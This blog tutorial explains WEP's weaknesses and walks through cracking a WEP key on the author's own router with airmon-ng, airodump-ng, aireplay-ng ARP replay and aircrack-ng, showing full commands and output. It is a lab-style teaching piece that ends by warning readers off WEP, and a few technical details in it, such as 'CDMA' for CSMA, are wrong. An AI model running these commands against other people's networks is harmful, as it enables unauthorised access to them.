Playing with other people Wi-Fi part 1: The good old “WEP”

Many of us own a Wi-Fi network at home. It is great, convenient and no cables! When this technology first came to existence there were several competitors available as well (Remember DECT ? [wikipedia.org]). One of key points for the Wi-Fi developers was also to drive the cost of equipment down and they inevitably created two problems. Let me quickly talk about some basic issues in the Wi-Fi and then we will move to the practical cracking of WEP encryption. I intend to drive this article as first in the series and I will be mostly focused on the end-user practicalities and only linking to the most interesting theory articles.

Wifi Part 1 thumbnails

Ok, so back to the Wi-Fi inherited problems. First is that the standard nearly ignored having two Wi-Fi networks operating in the same channel to make the equipment as cheap as possible. You might remember that Wi-Fi uses ethernet’s “Carrier sense multiple access with collision detection” (CDMA/CD) but extended to “Carrier sense multiple access with collision avoidance” (CDMA/CA). The extension introduced some great new messages like CTS (Clear to send) and RTS (Request to send). These control messages basically have given control of access to the channel to the access-point. Now the access-point manages all the clients to avoid collisions, but if there are two independent access-points, they pretty much do not care about each other and we are back to the old CDMA/CD system with back-off timers and retransmissions after collisions.

Second drawback is that in order to win the Wi-Fi standard race, the creators created the initial security protection called “Wired Equivalent Privacy” (or WEP [wikipedia.org]) in a rush and without any public driven testing. The wireless standard of 802.11 won the race, but soon afterwards the WEP flaws were identified and it was proved as very easily penetrated.

It is actually easy to explain why it is so vulnerable. Main point is that the encryption algorithm behind is a stream cipher that starts with a combination of your “password” and a random 24bit Initialization vector. Originally the WEP standard has given users 40bit password option and later also 104 bit password option (always add the IV to get 64bit encryption key or 128bit encryption key). Then this key always encrypts the traffic while the continuously changing IV should provide protection against reply attacks. Technically the RC4 provides a continuous stream of key bits, these bits are then mapped with XOR function to each bit of the underlining data.

WEP encryption with RC4 generating keystream for XOR function [wikipedia.org]
But the main security fail of this mechanism is that the Initiation Vector is “only 24bit” long and cannot protect the key in a busy network. For example it is estimated that the IV loops every 5000 packets. In 2001 a passive attack was published by FLuhrer, Martin and Shamir that allowed you can only capture the packets from air and then perform this attack on them to recover a key very easily. In summary all you have to do to crack the code is to capture a very large number of packets to get large number of IVs and then start cracking the WEP key.  Depending on the target network activity you can have the key in a few hours.

Furthermore, in 2007 the attack was significantly improved by a method of “arp-injection”. From this point it was no longer a passive attack and thanks to that it shortened the attack time to a few minutes. The idea is simple, it is possible to recognize ARP (Address Resolution Protocol) packets in the encrypted network without knowing the  encryption key and then spoof deathentification of the originating client and re-sending the captured ARP packet back to the network. Every resended ARP enables you to capture additional IV vector by listening for a ARP reply. This is possible because the ARP packet structure is very static in nature and the ARP reply you get is always the same, only encrypted with a different IV. If you remember mathematics from school, when you get many ARP replies you essentially can construct an equation with both plain text, password as static variables, and only the IV varies. This help the cracking process by several orders of magnitude.

Contents

Practical example how to crack WEP

First, lets look what do we need for this task. For the moral and legal reasons, please get your own access-point and configure it with WEP encryption. Then we need two PCs (technically possible with one and two Wi-Fi cards, but two PCs are better). One PC will act as a client (so that it will generate traffic) and the other PC will be for the attacker simulation.

TP-Link 722n
TP-Link 722n

Regarding my personal hardware, I have used a a TP-Link 722n wireless card, with a great external antenna adapter and good support from the hacking tools. As a target I used my TP-Link 741ND wifi router. As a test client I have used my iPhone.

For the software needed you can go in two directions, I personally have dual-boot with BackTrack Linux. This is ubuntu based distribution designed for penetration-testing and comes with all the best selection of security auditing and penetration testing tools as well as already modified drivers to support advanced attacks like arp-injection (which is not needed for a normal user). You can also simply

TP-Link 741nd
TP-Link 741nd

download this image and start it as a live CD (or inside USB). Second option is to start your linux distribution (yes, you need one) and install aircrack-ng package (most probably test below step 0, and maybe you will have to google for your Wi-FI card if it supports at minimum a promiscuous mode of operation).

Step 0. Initialize airmon-ng and test packet injection

First check with ifconfig if your wifi card is recognized as root type “ifconfig” and look for any wlanX or athX card. Maybe if it is in shutdown state try with “ifconfig -a” and then activate it with for example “ifconfig wlanX up”. In my example the card is wlan1 (wlan0 is integrated intel Wi-Fi that is not really usable for attacks).

root@bt:~# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93
inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:15197 errors:0 dropped:0 overruns:0 frame:0
TX packets:15980 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4836106 (4.8 MB)  TX bytes:18487451 (18.4 MB)
Interrupt:18

lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:970 errors:0 dropped:0 overruns:0 frame:0
TX packets:970 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:69553 (69.5 KB)  TX bytes:69553 (69.5 KB)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41
BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

So in the next steps we activate the airmon-ng package and this will put the wlan1 card into promiscuous mode and create virtual interface mon0 that we will use for attacks.

root@bt:~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1314    dhclient3
1525    dhclient3
11757   dhclient
Process with PID 1525 (dhclient3) is running on interface wlan0

Interface       Chipset         Driver

wlan1           Atheros AR9271  ath9k - [phy1]
                                (monitor mode enabled on mon0)
wlan0           Intel 3945ABG   iwl3945 - [phy0]

NOTE: Sometimes the airmon-ng will tell you that there are programs running that can interfere with your network card and that you should close them. For example NetworkManager or a dhclient. Kill tham with the kill <pid> command before continuing.

Lets look at the ifconfig again and you will notice a new interface in the ifconfig output.

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93  
          inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
          inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15684 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16179 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4898437 (4.8 MB)  TX bytes:18514654 (18.5 MB)
          Interrupt:18

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1011 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:72513 (72.5 KB)  TX bytes:72513 (72.5 KB)

mon0      Link encap:UNSPEC  HWaddr D8-5D-4C-91-AB-41-00-00-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:118351 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:28476367 (28.4 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Now lets test if the packet-injection works. It will also look around for networks on the same channel and will try to resend a few packets.

root@bt:~# aireplay-ng --test mon0
21:48:16  Trying broadcast probe requests...
21:48:16  Injection is working!
21:48:18  Found 1 APs

21:48:18  Trying directed probe requests...
21:48:19  F8:D1:11:37:C2:0E - channel: 6 - 'WEPcrackTest'
21:48:19  Ping (min/avg/max): 1.322ms/15.453ms/39.641ms Power: -88.62
21:48:19  29/30:  96%

Step 1. Find the target network using WEP.

For our little test, I have configured my access-point with single wifi called “WEPcrackTest” and let’s pretend that we didn’t know this. I would personally use inSSIDer, but there are alternatives directly on linux like “ssidsniff” or “iwlist scanning”. So for simplycity, lets try the “iwlist scanning”. You can find WEP encrypted networks if the corresponding Cell has no WPA/WPA2 mentioned and the “Encryption key:on” as indicated below.

root@bt:~# iwlist wlan1 scanning
wlan1     Scan completed :
          Cell 01 - Address: F8:D1:11:37:C2:0E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm  
                    Encryption key:on
                    ESSID:"WEPcrackTest"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000000021c87180
                    Extra: Last beacon: 576ms ago
                    IE: Unknown: 000C574550637261636B54657374
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 050400010000
                    IE: Unknown: 0706534B20010D14
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD3F0050F204104A00011010440001021047001000000000000010000000F8D11137C210103C000101104900140024E26002000101600000020001600100020001
                    IE: Unknown: DD050050F20500

 Step 2. Start capturing IVs

Just as historically, your first need is to capture enough IVs (at least 50,000) to have a chance of cracking the WEP encryption. This process is best started in some parallel sessions so please open another terminal windows or use “screen” commands for background session. We will use the airodump-ng command with “-c 6” telling it to capture on channel 6, “–bssid” specifies the mac-address of the Access-Points radio to specifiy a target and and “-w” specifies the output file where to store the captured packets. Last parameter is the interface identifier and we use our “mon0”.

root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0
 CH  6 ][ Elapsed: 0 s ][ 2013-07-15 22:45                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                

 F8:D1:11:37:C2:0E  -71 100       27        0    0   6  54e. WEP  WEP         WEPcrackTest         

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Ok, start the capturing and leave it running until we have a lot of IVs.

Step 3. Arp Injection attack to speed IV capture.

The logic is as follows, we will do fake authentication against the access point and wait for any captured ARP packet, once we capture one we will start resending it back to the network and captured replies to our fake replies will allow us to capture large number of IVs from step 2. But for all this, we need to first associate using the aireplay-ng command as follows. “-1 0” is the attack type, in this case type 0 what is association only. “-e WEPcrackTest” is name of network to associate to, “-a F8:D1:11:37:C2:0E” is the access point mac-address again, “-h D8:5D:4C:91:AB:41” is mac-address of your wireless card (find it from the ifconfig command) and at the end is the wifi interface mon0.

root@bt:~# aireplay-ng -1 0 -e WEPcrackTest -a F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:13:59  Sending Authentication Request
23:14:01  Authentication successful
23:14:03  Sending Association Request
23:14:04  Association successful :-)

Second part is start listening for ARP packets and if such packets comes, initiate retransmission. To do this we will use aireplay-ng command with attack type “-3”, wifi accesspoint is “-b F8:D1:11:37:C2:0E”, your wifi interface mac-address is “-h D8:5D:4C:91:AB:41” and we are opening this attack on interface mon0.

root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:22:55  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0715-232255.cap
You should also start airodump-ng to capture replies.
Read 290 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Great, notice the “sent 0 packets” at the end. Now we wait for some real client to connect and once he connects, the attack will start to run automatically. In summary right now you should have in one terminal running this replay attack and in another running capture from step 2.

Step 4. Simulating legal user to start ARP-reply

This step is artificial in our example as in real attack you would just leave all from previous steps running and wait for some user on the network to send ARP. To speed things in our little test, I will connect my second interface card wlan0 to the test network and generate an ARP manually. So this is how you can connect to a WEP network (notice that on this point I am telling you the key that is “apple”:

root@bt:~# iwconfig wlan0 essid WEPcrackTest
root@bt:~# iwconfig wlan0 channel 6
root@bt:~# iwconfig wlan0 enc on key s:apple
root@bt:~# ifconfig wlan0 up
root@bt:~# dhclient wlan0
There is already a pid file /var/run/dhclient.pid with pid 9745
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   Socket/fallback
DHCPREQUEST of 192.168.10.171 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.10.171 from 192.168.10.130
bound to 192.168.10.171 -- renewal in 111969 seconds.

Now lets have a look on the arp table, you will most probably see that the we have already resolved the default gateway after or during the DHCP negotiation, so we already have one ARP probably captured.

root@bt:~# arp -a
? (192.168.10.142) at 2c:59:e5:04:64:92 [ether] on eth0
? (192.168.10.130) at 00:0c:42:37:40:44 [ether] on wlan0

Now check your step 3 arp-reply attack if it already captured some ARP packets are it is sending them back to the network. Most probably it will be already running crazy fast sending all those ARP requests like below!

root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
19:09:05  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0716-190905.cap
You should also start airodump-ng to capture replies.
Read 286478 packets (got 91977 ARP requests and 95113 ACKs), sent 95116 packets...(500 pps)

Also if you look at the capture from step 2, you will notice now that the capture rate has accelerated several times. And notice that it si “as if” coming from the host with mac-address D8:5D:4C:91:AB:41. This is our wlan0 mac-address but this large number of packets is definitely not coming from that interface.

root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0
 CH  6 ][ Elapsed: 4 mins ][ 2013-07-16 19:13                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           

 F8:D1:11:37:C2:0E  -45  87     2884   107421  441   6  54e. WPA  WEP    OPN  WEPcrackTest    

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    

 F8:D1:11:37:C2:0E  D8:5D:4C:91:AB:41    0    0 - 1    765   234755                            
 F8:D1:11:37:C2:0E  00:1F:3C:37:D1:C5  -49   54e- 1e     0     1751  WEPcrackTest

Step 5, Wait and crack

Now we leave it running for a little while and we can periodically test if we already have enough IVs to crack the key. In step 2 I used the parameter -w to capture all traffic to a file called WEP.cap. You can notice that the file size is increasing over time. We will use the aircrack-ng -w -b F8:D1:11:37:C2:0E ./WEP.cap command. The -w parameter tells that we are going to attempt to crack the code from a file, -b specifies what access-points traffic is interesting for us (because you can just capture in step 2 from multiple networks at once) and at the end we specify what file to use as source of data.

root@bt:~# aircrack-ng ./WEP.cap
Opening ./WEP.cap
Read 1459354 packets.

   #  BSSID              ESSID                     Encryption

   1  F8:D1:11:37:C2:0E  WEPcrackTest              WEP (336090 IVs)

Choosing first network as target.

Opening ./WEP.cap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 337296 ivs.
                     KEY FOUND! [ 61:70:70:6C:65 ] (ASCII: apple )
        Decrypted correctly: 100%

And here you have it, “KEY FOUND!” and it is found as “ASCII: apple”. This was very easy, no ?

Concolusion

In summary for whatever reason do not operate WEP encryption on your Wi-Fi network. I know that this is an old technology and with the standards like 802.11n not having even direct support for it anymore it will eventually die. But until then, I have scanned the area around my home with a 24db antenna and I have located three WEP encrypted networks from the 27 networks around. So there are still people who can be exploited and probably have no idea about it. Make sure you are not one of them.

I am already writing a next part about cracking WPA/WPA2 using the WPS vulnerabilities.

---
Peter Havrila , published on